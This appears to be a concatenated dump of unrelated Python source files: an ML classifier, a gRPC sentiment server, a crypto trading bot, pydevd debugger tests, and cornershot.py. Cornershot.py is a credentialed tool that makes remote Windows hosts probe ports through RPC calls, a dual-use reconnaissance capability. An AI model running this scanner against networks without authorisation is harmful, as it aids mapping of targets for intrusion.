# predict_payload = {'name': name, 'locations': [], 'probabilities': []}
# for tup in predictions:
# predict_payload['locations'].append(
# str(self.naming['from'][tup[0]]))
# predict_payload['probabilities'].append(round(tup[1], 2))
# payload['predictions'].append(predict_payload)
# self.logger.debug("{} {:d} ms".format(
# name, int(1000 * (t2 - time.time()))))
# except Exception as e:
# self.logger.error(str(e))
# self.logger.debug("{} {:d} ms".format(
# name, int(1000 * (t - time.time()))))
self.results[index] = predict_payload
@timeout(10)
def train(self, clf, x, y):
return clf.fit(x, y)
def learn(self, fname):
t = time.time()
# load CSV file
self.header = []
rows = []
naming_num = 0
with open(fname, 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for i, row in enumerate(reader):
if i == 0:
self.header = row
else:
for j, val in enumerate(row):
if val == '':
row[j] = 0
continue
try:
row[j] = float(val)
except:
if val not in self.naming['from']:
self.naming['from'][val] = naming_num
self.naming['to'][naming_num] = val
naming_num += 1
row[j] = self.naming['from'][val]
rows.append(row)
# first column in row is the classification, Y
y = numpy.zeros(len(rows))
x = numpy.zeros((len(rows), len(rows[0]) - 1))
# shuffle it up for training
record_range = list(range(len(rows)))
shuffle(record_range)
for i in record_range:
y[i] = rows[i][0]
x[i, :] = numpy.array(rows[i][1:])
names = [
"Nearest Neighbors",
"Linear SVM",
"RBF SVM",
# "Gaussian Process",
"Decision Tree",
"Random Forest",
"Neural Net",
"AdaBoost",
"Naive Bayes",
"QDA"]
classifiers = [
KNeighborsClassifier(3),
SVC(kernel="linear", C=0.025, probability=True),
SVC(gamma=2, C=1, probability=True),
# GaussianProcessClassifier(1.0 * RBF(1.0), warm_start=True),
DecisionTreeClassifier(max_depth=5),
RandomForestClassifier(
max_depth=5, n_estimators=10, max_features=1),
MLPClassifier(alpha=1),
AdaBoostClassifier(),
GaussianNB(),
QuadraticDiscriminantAnalysis()]
self.algorithms = {}
# split_for_learning = int(0.70 * len(y))
for name, clf in zip(names, classifiers):
t2 = time.time()
self.logger.debug("learning {}".format(name))
try:
self.algorithms[name] = self.train(clf, x, y)
# score = self.algorithms[name].score(x,y)
# logger.debug(name, score)
self.logger.debug("learned {}, {:d} ms".format(
name, int(1000 * (t2 - time.time()))))
except Exception as e:
self.logger.error("{} {}".format(name, str(e)))
# t2 = time.time()
# name = "Extended Naive Bayes"
# clf = ExtendedNaiveBayes(self.family, path_to_data=self.path_to_data)
# try:
# clf.fit(fname)
# self.logger.debug("learned {}, {:d} ms".format(
# name, int(1000 * (t2 - time.time()))))
# except Exception as e:
# self.logger.error(str(e))
# t2 = time.time()
# name = "Extended Naive Bayes2"
# clf = ExtendedNaiveBayes2(self.family, path_to_data=self.path_to_data)
# try:
# clf.fit(fname)
# self.logger.debug("learned {}, {:d} ms".format(
# name, int(1000 * (t2 - time.time()))))
# except Exception as e:
# self.logger.error(str(e))
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def save(self, save_file):
t = time.time()
f = gzip.open(save_file, 'wb')
pickle.dump(self.header, f)
pickle.dump(self.naming, f)
pickle.dump(self.algorithms, f)
pickle.dump(self.family, f)
f.close()
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def load(self, save_file):
t = time.time()
f = gzip.open(save_file, 'rb')
self.header = pickle.load(f)
self.naming = pickle.load(f)
self.algorithms = pickle.load(f)
self.family = pickle.load(f)
f.close()
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def do():
ai = AI()
ai.load()
# ai.learn()
params = {'quantile': .3,
'eps': .3,
'damping': .9,
'preference': -200,
'n_neighbors': 10,
'n_clusters': 3}
bandwidth = cluster.estimate_bandwidth(ai.x, quantile=params['quantile'])
connectivity = kneighbors_graph(
ai.x, n_neighbors=params['n_neighbors'], include_self=False)
# make connectivity symmetric
connectivity = 0.5 * (connectivity + connectivity.T)
ms = cluster.MeanShift(bandwidth=bandwidth, bin_seeding=True)
two_means = cluster.MiniBatchKMeans(n_clusters=params['n_clusters'])
ward = cluster.AgglomerativeClustering(
n_clusters=params['n_clusters'], linkage='ward',
connectivity=connectivity)
spectral = cluster.SpectralClustering(
n_clusters=params['n_clusters'], eigen_solver='arpack',
affinity="nearest_neighbors")
dbscan = cluster.DBSCAN(eps=params['eps'])
affinity_propagation = cluster.AffinityPropagation(
damping=params['damping'], preference=params['preference'])
average_linkage = cluster.AgglomerativeClustering(
linkage="average", affinity="cityblock",
n_clusters=params['n_clusters'], connectivity=connectivity)
birch = cluster.Birch(n_clusters=params['n_clusters'])
gmm = mixture.GaussianMixture(
n_components=params['n_clusters'], covariance_type='full')
clustering_algorithms = (
('MiniBatchKMeans', two_means),
('AffinityPropagation', affinity_propagation),
('MeanShift', ms),
('SpectralClustering', spectral),
('Ward', ward),
('AgglomerativeClustering', average_linkage),
('DBSCAN', dbscan),
('Birch', birch),
('GaussianMixture', gmm)
)
for name, algorithm in clustering_algorithms:
with warnings.catch_warnings():
warnings.filterwarnings(
"ignore",
message="the number of connected components of the " +
"connectivity matrix is [0-9]{1,2}" +
" > 1. Completing it to avoid stopping the tree early.",
category=UserWarning)
warnings.filterwarnings(
"ignore",
message="Graph is not fully connected, spectral embedding" +
" may not work as expected.",
category=UserWarning)
try:
algorithm.fit(ai.x)
except:
continue
if hasattr(algorithm, 'labels_'):
y_pred = algorithm.labels_.astype(numpy.int)
else:
y_pred = algorithm.predict(ai.x)
if max(y_pred) > 3:
continue
known_groups = {}
for i, group in enumerate(ai.y):
group = int(group)
if group not in known_groups:
known_groups[group] = []
known_groups[group].append(i)
guessed_groups = {}
for i, group in enumerate(y_pred):
if group not in guessed_groups:
guessed_groups[group] = []
guessed_groups[group].append(i)
for k in known_groups:
for g in guessed_groups:
print(
k, g, len(set(known_groups[k]).intersection(guessed_groups[g])))
# ai = AI()
# ai.learn("../testing/testdb.csv")
# ai.save("dGVzdGRi.find3.ai")
# ai.load("dGVzdGRi.find3.ai")
# a = json.load(open('../testing/testdb_single_rec.json'))
# classified = ai.classify(a)
# print(json.dumps(classified,indent=2))
|
sentiment_analysis_server.py | import grpc
from concurrent import futures
import threading
import logging
# import the generated classes :
import model_pb2
import model_pb2_grpc
from app import app_run
# import the function we made :
import model as psp
port = 8061
results = []
# create a class to define the server functions, derived from
class sentiment_analysis_modelServicer(model_pb2_grpc.sentiment_analysis_modelServicer):
def classify_review(self, request, context):
# define the buffer of the response :
response = model_pb2.Review_Classify()
# get the value of the response by calling the desired function :
response.review = psp.classify_review(request.query)
result = [request.query, response.review]
with open("results.txt", mode="a+") as f:
# for e0, e1, e2, e3, e4, e5 in result:
f.write(str(request.query) + "|" + str(response.review) + "\n")
f.close()
return response
def serve():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
model_pb2_grpc.add_sentiment_analysis_modelServicer_to_server(sentiment_analysis_modelServicer(), server)
server.add_insecure_port('[::]:{}'.format(port))
server.start()
threading.Thread(target=app_run()).start()
server.wait_for_termination()
if __name__ == '__main__':
logging.basicConfig()
open('results.txt', 'w').close()
serve()
|
wss.py | # -*- coding: utf-8 -*-
"""
Created on Sat Mar 24 00:16:07 2020
@author: tranl
"""
import time, sys, math
import numpy as np
import pandas as pd
import websocket
import threading
import json
from tradingpy import PRICEPRE, SIDE, Signal
from utility import print_, orderstr, timestr, barstr
def wss_run(*args):
def on_message(ws, message):
'''
Control the message received from
'''
mess = json.loads(message)
if mess['e'] == 'kline':
kln = mess['k']
if kln['x'] is True:
symbol = kln['s'].upper()
new_kln = { '_t': int(kln['t']), '_o': float(kln['o']), '_h': float(kln['h']), '_l': float(kln['l']), '_c': float(kln['c']), '_v': float(kln['q']) }
SymKlns[symbol].append(new_kln)
print_( '%d. %s\t' % (len(SymKlns[symbol]), symbol) + timestr(new_kln['_t']) + '\t' + \
''.join(['{:>3}:{:<10}'.format(k, v) for k,v in iter(new_kln.items()) if not k=='_t']), fileout)
def on_error(ws, error):
'''
Do something when websocket has an error
'''
pass
def on_close(ws):
'''
Do something when websocket closes
'''
pass
def on_open(ws, *args):
'''
Main function to run multi-threading
'''
def data_stream(*args):
'''
First thread to send subscription to the exchange
'''
params = [str.lower(ins) + str(s) for ins in insIds for s in stream]
print_(params, fileout)
ws.send(json.dumps({"method": "SUBSCRIBE", "params": params, "id": 1 }))
t1_idx = 0
while True:
if len(SymKlns[insIds[0]]) % 5 == 0 and len(SymKlns[insIds[0]]) > t1_idx and len(SymKlns[insIds[0]]) < models[insIds[0]].pdObserve:
client.keepalive_stream()
t1_idx = len(SymKlns[insIds[0]])
def strategy(*args):
'''
Second thread to generate signals upon the message from the exchange
'''
t2_idx = {}
for symbol in insIds:
t2_idx[symbol] = 0
while len(SymKlns[insIds[0]]) < models[insIds[0]].pdObserve:
for symbol in insIds:
sym_ = SymKlns[symbol].copy()
if len(sym_) > t2_idx[symbol]:
if models[symbol].modelType == 'bollinger':
data_ob = pd.DataFrame(sym_)
model_sig = models[symbol].get_last_signal(dataObserve=data_ob)
else: model_sig = None
if model_sig is not None:
ready = True
if ready:
side, positionSide, startTime = model_sig['side'], model_sig['positionSide'], model_sig['_t']+60*1000
expTime, price = startTime + 5*60*1000, round(model_sig['_p'], PRICEPRE[symbol]) #
stopLoss = model_sig['atr']
takeProfit = model_sig['atr']
new_sig = Signal(symbol=symbol, side=side, size=models[symbol].orderSize, orderType='LIMIT', positionSide=positionSide, price=price, startTime=startTime, expTime=expTime, \
stopLoss=stopLoss, takeProfit=takeProfit, timeLimit=models[symbol].pdEstimate*60, timeInForce='GTC')
if in_possition_(Signals[symbol], side='BOTH') or position_count(insIds, Signals, side=side) >= portfolio.equityDist[side]:
new_sig.set_expired()
else:
for sig in Signals[symbol]:
if sig.is_waiting():
sig.set_expired()
print_('\n\tSet WAITING signal EXPIRED: \n\t' + str(sig), fileout)
Signals[symbol].append(new_sig)
print_('\n\tFOUND ' + str(new_sig), fileout)
t2_idx[symbol] = len(sym_)
def book_manager(*args):
'''
Third thread to excecute/cancel/track the signals generated in strategy()
'''
while len(SymKlns[insIds[0]]) < models[insIds[0]].pdObserve:
time.sleep(1)
for symbol in insIds:
in_position = False
last_signal = None
for sig in Signals[symbol]:
model = models[symbol]
sv_time = client.timestamp()
if sig.is_waiting():
### Check for EXPIRED order here ###
if sv_time > sig.expTime:
sig.set_expired()
print_('\n\tSet WAITING signal EXPIRED: \n\t' + str(sig), fileout)
else:
last_signal = sig
elif sig.is_ordered():
### Set ACTIVE order here ###
in_position = True
order_update = client.query_order(symbol, sig.orderId)
if order_update['status'] == 'FILLED':
sig.set_active(excTime=order_update['updateTime'], excPrice=order_update['avgPrice'], excQty=order_update['executedQty'])
sig.path_update(lastTime=sig.excTime, lastPrice=sig.excPrice)
print_('\n\tSet BOOKED order ACTIVE: \n\t' + str(sig) + '\n\t' + orderstr(order_update), fileout)
### PROBLEM 3 Insert your code to handle EXPIRED and PARTIALLY_FILLED order here ###
elif sig.is_active():
### Control ACTIVE position here ###
in_position = True
recent_trades = model.marketData.recent_trades(limit=5)
for trade in recent_trades:
if int(trade['time']) > sig.pricePath[-1]['timestamp']:
sig.path_update({'timestamp': trade['time'], 'price': trade['price']})
exit_sign, pos = sig.exit_triggers()
if exit_sign:
print_('\n\tFound ' + str(exit_sign) + '{}\n'.format(round(pos,4)), fileout)
cnt_order = sig.counter_order()
order = client.new_order(symbol=symbol, side=cnt_order['side'], orderType='MARKET', quantity=cnt_order['amt'], positionSide=sig.positionSide) #, timeInForce=cnt_order['TIF'], price=lim)
sig.set_cnt_ordered(cntorderId=order['orderId'], cntType='MARKET', cntTime=order['updateTime'])
print_('\tPlaced COUNTER order: \n\t' + str(sig) + '\n\t' + orderstr(order), fileout)
elif sig.is_cnt_ordered():
### Set CLOSED position here ###
in_position = True
order_update = client.query_order(symbol, sig.cntorderId)
if order_update['status'] == 'FILLED':
sig.set_closed(clsTime=order_update['updateTime'], clsPrice=order_update['avgPrice'])
print_('\n\tClosed order: \n\t' + str(sig) + '\n\t' + orderstr(order_update), fileout)
if (not in_position) and (last_signal is not None):
### Check for ENTRY and place NEW order here ###
sig = last_signal
if sig.orderType == 'MARKET':
order = client.new_order(symbol=symbol, side=sig.side, orderType=sig.orderType, quantity=sig.get_quantity(), positionSide=sig.positionSide)
sig.set_ordered(orderId=order['orderId'], orderTime=order['updateTime'], limitPrice=None)
print_('\n\tPlaced NEW order: \n\t' + str(sig) + '\n\t' + orderstr(order), fileout)
elif sig.orderType=='LIMIT':
bids, asks, lim = get_possible_price(model.marketData, sig.side)
order = client.new_order(symbol=symbol, side=sig.side, orderType=sig.orderType, quantity=sig.get_quantity(), positionSide=sig.positionSide, timeInForce='GTC', price=lim)
sig.set_ordered(orderId=order['orderId'], orderTime=order['updateTime'], limitPrice=lim)
print_('\n\tPlaced NEW order: \n\t' + str(sig) + '\n\t' + orderstr(order), fileout)
ws.close()
t1 = threading.Thread(target=data_stream)
t2 = threading.Thread(target=strategy)
t3 = threading.Thread(target=book_manager)
t1.start()
t2.start()
t3.start()
def position_count(insIds, signal_list, side='BOTH'):
'''
Returns number of open positions
'''
count = 0
for s in insIds:
for sig in signal_list[s]:
if sig.side==side or side=='BOTH':
if sig.is_ordered() or sig.is_active() or sig.is_cnt_ordered():
count += 1
return count
def in_possition_(signal_list, side='BOTH'):
'''
Check if there is any open positions
'''
in_pos = False
for sig in signal_list:
if sig.side==side or side=='BOTH':
if sig.is_ordered() or sig.is_active() or sig.is_cnt_ordered():
in_pos = True
break
return in_pos
def get_possible_price(mk_data, side):
'''
Return a safe limit price available on the market
'''
mk_depth = mk_data.order_book(limit=5)
bids = list(float(x[0]) for x in mk_depth['bids'])
asks = list(float(x[0]) for x in mk_depth['asks'])
lim = (side=='BUY')*(bids[0]+bids[1])/2 + (side=='SELL')*(asks[0]+asks[1])/2
lim = round(lim, PRICEPRE[mk_data.symbol.upper()])
return bids, asks, lim
start_time = time.time()
portfolio, client, testnet, stream, models, fileout = args
insIds = portfolio.tradeIns
SymKlns = {}
Signals = {}
for symbol in insIds:
SymKlns[symbol] = []
Signals[symbol] = []
listen_key = client.get_listen_key()
ws = websocket.WebSocketApp(f'{client.wss_way}{listen_key}',
on_message=on_message,
on_error=on_error,
on_close=on_close)
ws.on_open = on_open
ws.run_forever()
client.close_stream()
print_('\n' + barstr('Close Opening Positions', length=100, space_size=5) + '\n', fileout)
### PROBLEM 2 Insert your code to close all positions here ###
return Signals |
cornershot.py | import queue
import threading
import time
from random import uniform,shuffle
from .shots import PORT_UNKNOWN,PORT_FILTERED,PORT_OPEN
from .shots.even import EVENShot
from .shots.even6 import EVEN6Shot
from .shots.rprn import RPRNShot
from .shots.rrp import RRPShot
from . import logger
MAX_QUEUE_SIZE = 5000
TARGET_PORTS = [135, 445, 3389, 5985, 5986]
DEFAULT_SHOTS = [EVENShot, RPRNShot, RRPShot, EVEN6Shot]
class CornerShot(object):
def __init__(self, username, password, domain, workers=250, shots=None):
logger.debug(f'CS created with username: {username},domain:{domain},workers:{workers}')
if shots is None:
shots = DEFAULT_SHOTS
self.shot_classes = shots
self.username = username
self.password = password
self.domain = domain
self.workers = workers
self.bulletQ = queue.Queue()
self.resultQ = queue.Queue()
self.runthreads = True
self.results = {}
self.shot_list = []
self.total_shots = 0
self.current_tasks = []
self.skip_scanned = False
self.already_scanned = []
self.batch_scanned_event = None
def _takeashot(self):
while self.runthreads:
res = None
try:
bullet = self.bulletQ.get(timeout=0.1)
if bullet:
try:
res = bullet.shoot()
except TimeoutError:
logger.debug(f'Timeout error')
except Exception:
logger.debug(f'Unexpected exception during shot', exc_info=True)
finally:
self.bulletQ.task_done()
self.resultQ.put(res)
logger.debug(f'Bullet is none!')
except (queue.Empty,TimeoutError):
logger.debug(f'Exception during bullet load', exc_info=True)
except Exception:
logger.debug(f'Unexpected exception during bullet load', exc_info=True)
def add_shots(self, destinations, targets, target_ports=None, destination_ports=None):
if target_ports is None:
target_ports = TARGET_PORTS
self._shots_generator(destinations, targets, target_ports, destination_ports)
def add_many_shot_pairs(self, carrier_target_pairs, target_ports=None, destination_ports=None):
if target_ports is None:
target_ports = TARGET_PORTS
tport_shot_class = []
for target_port in target_ports:
tport_shot_class.append([target_port,self._get_suitable_shots(target_port, destination_ports)])
for ct_pair in carrier_target_pairs:
carrier = ct_pair[0]
target = ct_pair[1]
for tport_shot_class_pair in tport_shot_class:
target_port = tport_shot_class_pair[0]
for cls in tport_shot_class_pair[1]:
self.shot_list.append(cls(self.username, self.password, self.domain, carrier, target,target_port=target_port))
self.total_shots += len(self.shot_list)
def _shots_generator(self, destinations, targets, target_ports, destination_ports=None):
for destination in destinations:
for target in targets:
for target_port in target_ports:
for cls in self._get_suitable_shots(target_port, destination_ports):
self.shot_list.append(cls(self.username, self.password, self.domain, destination, target,target_port=target_port))
def _merge_result(self, dest, target, tport, state):
if self.skip_scanned and PORT_OPEN in state:
if target not in self.already_scanned:
self.already_scanned.append(target)
if dest not in self.results:
self.results[dest] = {}
if target not in self.results[dest]:
self.results[dest][target] = {}
if tport not in self.results[dest][target]:
self.results[dest][target][tport] = state
elif PORT_UNKNOWN in self.results[dest][target][tport]:
self.results[dest][target][tport] = state
elif PORT_FILTERED in self.results[dest][target][tport]:
pass
elif PORT_FILTERED in state:
self.results[dest][target][tport] = state
elif PORT_UNKNOWN in state:
pass
elif state not in self.results[dest][target][tport]:
self.results[dest][target][tport] += "|" + state
def _get_next_tasks(self,remaining):
new_tasks = []
remaining = min(len(self.shot_list),remaining)
if self.skip_scanned:
iterated_shots = 0
for bullet in self.shot_list:
if remaining > 0:
if bullet.target not in self.already_scanned:
new_tasks.append(bullet)
else:
logger.info(f"Skipping {bullet.target}, already scanned...")
self.total_shots -= 1
iterated_shots += 1
remaining -= 1
else:
break
self.shot_list = self.shot_list[iterated_shots:]
else:
new_tasks = self.shot_list[0:remaining ]
self.shot_list = self.shot_list[remaining + 1:]
return new_tasks
def _shots_manager(self):
remaining = min(self.workers,MAX_QUEUE_SIZE)
shuffle(self.shot_list)
self.total_shots = len(self.shot_list)
while self.runthreads:
self.current_tasks = self._get_next_tasks(remaining)
remaining = remaining - len(self.current_tasks)
for bt in self.current_tasks:
self.bulletQ.put(bt)
while True:
try:
result = self.resultQ.get(timeout=5)
if result:
destination, target, target_port, state = result
self._merge_result(destination, target, target_port, state)
self.resultQ.task_done()
remaining += 1
self.total_shots -= 1
if self.total_shots % 500 == 0:
self.batch_scanned_event.set()
if self.total_shots < 1:
self.runthreads = False
except (TimeoutError,queue.Empty):
break
self.total_shots = 0
self.batch_scanned_event.set()
def open_fire(self,blocking=True,skip_scanned=False):
self.skip_scanned = skip_scanned
self.total_shots = len(self.shot_list)
self.workers = min(self.total_shots,self.workers)
if self.total_shots > 0:
for _ in range(self.workers):
w = threading.Thread(target=self._takeashot, daemon=True)
w.start()
if blocking:
self._shots_manager()
return self.results
else:
main_thread = threading.Thread(target=self._shots_manager,daemon=True)
main_thread.start()
self.batch_scanned_event = threading.Event()
return self.batch_scanned_event
def read_results(self):
return self.results
def remaining_shots(self):
return self.total_shots
def _get_suitable_shots(self, target_port, destination_port):
class_list = []
for bc in self.shot_classes:
if destination_port:
if destination_port in bc.destination_port_range() and target_port in bc.target_port_range():
class_list.append(bc)
elif target_port in bc.target_port_range():
class_list.append(bc)
return class_list
|
test_utilities.py | import threading
from _pydevd_bundle.pydevd_utils import convert_dap_log_message_to_expression
from tests_python.debug_constants import IS_PY26, IS_PY3K, TEST_GEVENT, IS_CPYTHON
import sys
from _pydevd_bundle.pydevd_constants import IS_WINDOWS, IS_PY2, IS_PYPY
import pytest
import os
import codecs
from _pydevd_bundle.pydevd_thread_lifecycle import pydevd_find_thread_by_id
def test_expression_to_evaluate():
from _pydevd_bundle.pydevd_vars import _expression_to_evaluate
assert _expression_to_evaluate(b'expr') == b'expr'
assert _expression_to_evaluate(b' expr') == b'expr'
assert _expression_to_evaluate(b'for a in b:\n foo') == b'for a in b:\n foo'
assert _expression_to_evaluate(b' for a in b:\n foo') == b'for a in b:\nfoo'
assert _expression_to_evaluate(b' for a in b:\nfoo') == b' for a in b:\nfoo'
assert _expression_to_evaluate(b'\tfor a in b:\n\t\tfoo') == b'for a in b:\n\tfoo'
if IS_PY2:
assert _expression_to_evaluate(u' expr') == (codecs.BOM_UTF8 + b'expr')
else:
assert _expression_to_evaluate(u' expr') == u'expr'
assert _expression_to_evaluate(u' for a in expr:\n pass') == u'for a in expr:\npass'
def test_is_main_thread():
from _pydevd_bundle.pydevd_utils import is_current_thread_main_thread
from _pydevd_bundle.pydevd_utils import dump_threads
if not is_current_thread_main_thread():
error_msg = 'Current thread does not seem to be a main thread. Details:\n'
current_thread = threading.current_thread()
error_msg += 'Current thread: %s\n' % (current_thread,)
if hasattr(threading, 'main_thread'):
error_msg += 'Main thread found: %s\n' % (threading.main_thread(),)
else:
error_msg += 'Current main thread not instance of: %s (%s)' % (
threading._MainThread, current_thread.__class__.__mro__,)
try:
from StringIO import StringIO
except:
from io import StringIO
stream = StringIO()
dump_threads(stream=stream)
error_msg += '\n\n' + stream.getvalue()
raise AssertionError(error_msg)
class NonMainThread(threading.Thread):
def run(self):
self.is_main_thread = is_current_thread_main_thread()
non_main_thread = NonMainThread()
non_main_thread.start()
non_main_thread.join()
assert not non_main_thread.is_main_thread
def test_find_thread():
from _pydevd_bundle.pydevd_constants import get_current_thread_id
assert pydevd_find_thread_by_id('123') is None
assert pydevd_find_thread_by_id(
get_current_thread_id(threading.current_thread())) is threading.current_thread()
def check_dap_log_message(log_message, expected, evaluated, eval_locals=None):
ret = convert_dap_log_message_to_expression(log_message)
assert ret == expected
assert (eval(ret, eval_locals)) == evaluated
return ret
def test_convert_dap_log_message_to_expression():
assert check_dap_log_message(
'a',
"'a'",
'a',
)
assert check_dap_log_message(
'a {a}',
"'a %s' % (a,)",
'a value',
{'a': 'value'}
)
assert check_dap_log_message(
'a {1}',
"'a %s' % (1,)",
'a 1'
)
assert check_dap_log_message(
'a { }',
"'a '",
'a '
)
assert check_dap_log_message(
'a {1} {2}',
"'a %s %s' % (1, 2,)",
'a 1 2',
)
assert check_dap_log_message(
'a {{22:22}} {2}',
"'a %s %s' % ({22:22}, 2,)",
'a {22: 22} 2'
)
assert check_dap_log_message(
'a {(22,33)}} {2}',
"'a %s} %s' % ((22,33), 2,)",
'a (22, 33)} 2'
)
if not IS_PY26:
# Note: set literal not valid for Python 2.6.
assert check_dap_log_message(
'a {{1: {1}}}',
"'a %s' % ({1: {1}},)",
'a {1: {1}}' if IS_PY3K else 'a {1: set([1])}',
)
# Error condition.
assert check_dap_log_message(
'a {{22:22} {2}',
"'Unbalanced braces in: a {{22:22} {2}'",
'Unbalanced braces in: a {{22:22} {2}'
)
def test_pydevd_log():
from _pydev_bundle import pydev_log
try:
import StringIO as io
except:
import io
from _pydev_bundle.pydev_log import log_context
stream = io.StringIO()
with log_context(0, stream=stream):
pydev_log.critical('always')
pydev_log.info('never')
assert stream.getvalue() == 'always\n'
stream = io.StringIO()
with log_context(1, stream=stream):
pydev_log.critical('always')
pydev_log.info('this too')
assert stream.getvalue() == 'always\nthis too\n'
stream = io.StringIO()
with log_context(0, stream=stream):
pydev_log.critical('always %s', 1)
assert stream.getvalue() == 'always 1\n'
stream = io.StringIO()
with log_context(0, stream=stream):
pydev_log.critical('always %s %s', 1, 2)
assert stream.getvalue() == 'always 1 2\n'
stream = io.StringIO()
with log_context(0, stream=stream):
pydev_log.critical('always %s %s', 1)
# Even if there's an error in the formatting, don't fail, just print the message and args.
assert stream.getvalue() == 'always %s %s - (1,)\n'
stream = io.StringIO()
with log_context(0, stream=stream):
try:
raise RuntimeError()
except:
pydev_log.exception('foo')
assert 'foo\n' in stream.getvalue()
assert 'raise RuntimeError()' in stream.getvalue()
stream = io.StringIO()
with log_context(0, stream=stream):
pydev_log.error_once('always %s %s', 1)
# Even if there's an error in the formatting, don't fail, just print the message and args.
assert stream.getvalue() == 'always %s %s - (1,)\n'
def test_pydevd_logging_files(tmpdir):
from _pydev_bundle import pydev_log
from _pydevd_bundle.pydevd_constants import DebugInfoHolder
import os.path
from _pydev_bundle.pydev_log import _LoggingGlobals
try:
import StringIO as io
except:
import io
from _pydev_bundle.pydev_log import log_context
stream = io.StringIO()
with log_context(0, stream=stream):
d1 = str(tmpdir.join('d1'))
d2 = str(tmpdir.join('d2'))
for d in (d1, d2):
DebugInfoHolder.PYDEVD_DEBUG_FILE = os.path.join(d, 'file.txt')
pydev_log.initialize_debug_stream(reinitialize=True)
assert os.path.normpath(_LoggingGlobals._debug_stream_filename) == \
os.path.normpath(os.path.join(d, 'file.%s.txt' % os.getpid()))
assert os.path.exists(_LoggingGlobals._debug_stream_filename)
assert pydev_log.list_log_files(DebugInfoHolder.PYDEVD_DEBUG_FILE) == [
_LoggingGlobals._debug_stream_filename]
def _check_tracing_other_threads():
import pydevd_tracing
import time
from tests_python.debugger_unittest import wait_for_condition
try:
import _thread
except ImportError:
import thread as _thread
# This method is called in a subprocess, so, make sure we exit properly even if we somehow
# deadlock somewhere else.
def dump_threads_and_kill_on_timeout():
time.sleep(10)
from _pydevd_bundle import pydevd_utils
pydevd_utils.dump_threads()
time.sleep(1)
import os
os._exit(77)
_thread.start_new_thread(dump_threads_and_kill_on_timeout, ())
def method():
while True:
trace_func = sys.gettrace()
if trace_func:
threading.current_thread().trace_func = trace_func
break
time.sleep(.01)
def dummy_thread_method():
threads.append(threading.current_thread())
method()
threads = []
threads.append(threading.Thread(target=method))
threads[-1].daemon = True
threads[-1].start()
_thread.start_new_thread(dummy_thread_method, ())
wait_for_condition(lambda: len(threads) == 2, msg=lambda:'Found threads: %s' % (threads,))
def tracing_func(frame, event, args):
return tracing_func
assert pydevd_tracing.set_trace_to_threads(tracing_func) == 0
def check_threads_tracing_func():
for t in threads:
if getattr(t, 'trace_func', None) != tracing_func:
return False
return True
wait_for_condition(check_threads_tracing_func)
assert tracing_func == sys.gettrace()
def _build_launch_env():
import os
import pydevd
environ = os.environ.copy()
cwd = os.path.abspath(os.path.dirname(__file__))
assert os.path.isdir(cwd)
resources_dir = os.path.join(os.path.dirname(pydevd.__file__), 'tests_python', 'resources')
assert os.path.isdir(resources_dir)
attach_to_process_dir = os.path.join(os.path.dirname(pydevd.__file__), 'pydevd_attach_to_process')
assert os.path.isdir(attach_to_process_dir)
pydevd_dir = os.path.dirname(pydevd.__file__)
assert os.path.isdir(pydevd_dir)
environ['PYTHONPATH'] = (
cwd + os.pathsep +
resources_dir + os.pathsep +
attach_to_process_dir + os.pathsep +
pydevd_dir + os.pathsep +
environ.get('PYTHONPATH', '')
)
return cwd, environ
def _check_in_separate_process(method_name, module_name='test_utilities', update_env={}):
import subprocess
cwd, environ = _build_launch_env()
environ.update(update_env)
subprocess.check_call(
[sys.executable, '-c', 'import %(module_name)s;%(module_name)s.%(method_name)s()' % dict(
method_name=method_name, module_name=module_name)],
env=environ,
cwd=cwd
)
@pytest.mark.skipif(not IS_CPYTHON, reason='Functionality to trace other threads requires CPython.')
def test_tracing_other_threads():
# Note: run this test in a separate process so that it doesn't mess with any current tracing
# in our current process.
_check_in_separate_process('_check_tracing_other_threads')
@pytest.mark.skipif(not IS_CPYTHON, reason='Functionality to trace other threads requires CPython.')
def test_find_main_thread_id():
# Note: run the checks below in a separate process because they rely heavily on what's available
# in the env (such as threads or having threading imported).
_check_in_separate_process('check_main_thread_id_simple', '_pydevd_test_find_main_thread_id')
_check_in_separate_process('check_main_thread_id_multiple_threads', '_pydevd_test_find_main_thread_id')
_check_in_separate_process('check_win_threads', '_pydevd_test_find_main_thread_id')
_check_in_separate_process('check_fix_main_thread_id_multiple_threads', '_pydevd_test_find_main_thread_id')
import subprocess
import pydevd
cwd, environ = _build_launch_env()
subprocess.check_call(
[sys.executable, '-m', '_pydevd_test_find_main_thread_id'],
env=environ,
cwd=cwd
)
resources_dir = os.path.join(os.path.dirname(pydevd.__file__), 'tests_python', 'resources')
subprocess.check_call(
[sys.executable, os.path.join(resources_dir, '_pydevd_test_find_main_thread_id.py') ],
env=environ,
cwd=cwd
)
@pytest.mark.skipif(not IS_WINDOWS, reason='Windows-only test.')
def test_get_ppid():
from _pydevd_bundle.pydevd_api import PyDevdAPI
api = PyDevdAPI()
if IS_PY3K:
# On python 3 we can check that our internal api which is used for Python 2 gives the
# same result as os.getppid.
ppid = os.getppid()
assert api._get_windows_ppid() == ppid
else:
assert api._get_windows_ppid() is not None
def _check_gevent(expect_msg):
from _pydevd_bundle.pydevd_utils import notify_about_gevent_if_needed
assert not notify_about_gevent_if_needed()
import gevent
assert not notify_about_gevent_if_needed()
import gevent.monkey
assert not notify_about_gevent_if_needed()
gevent.monkey.patch_all()
assert notify_about_gevent_if_needed() == expect_msg
def check_notify_on_gevent_loaded():
_check_gevent(True)
def check_dont_notify_on_gevent_loaded():
_check_gevent(False)
@pytest.mark.skipif(not TEST_GEVENT, reason='Gevent not installed.')
def test_gevent_notify():
_check_in_separate_process('check_notify_on_gevent_loaded', update_env={'GEVENT_SUPPORT': ''})
_check_in_separate_process('check_dont_notify_on_gevent_loaded', update_env={'GEVENT_SUPPORT': 'True'})
def test_interrupt_main_thread():
from _pydevd_bundle.pydevd_utils import interrupt_main_thread
import time
main_thread = threading.current_thread()
def interrupt():
# sleep here so that the main thread in the test can get to the sleep too (otherwise
# if we interrupt too fast we won't really check that the sleep itself
# got interrupted -- although if that happens on some tests runs it's
# not really an issue either).
time.sleep(1)
interrupt_main_thread(main_thread)
if IS_PYPY:
# On PyPy a time.sleep() is not being properly interrupted,
# so, let's just check that it throws the KeyboardInterrupt in the
# next instruction.
timeout = 2
else:
timeout = 20
initial_time = time.time()
try:
t = threading.Thread(target=interrupt)
t.start()
time.sleep(timeout)
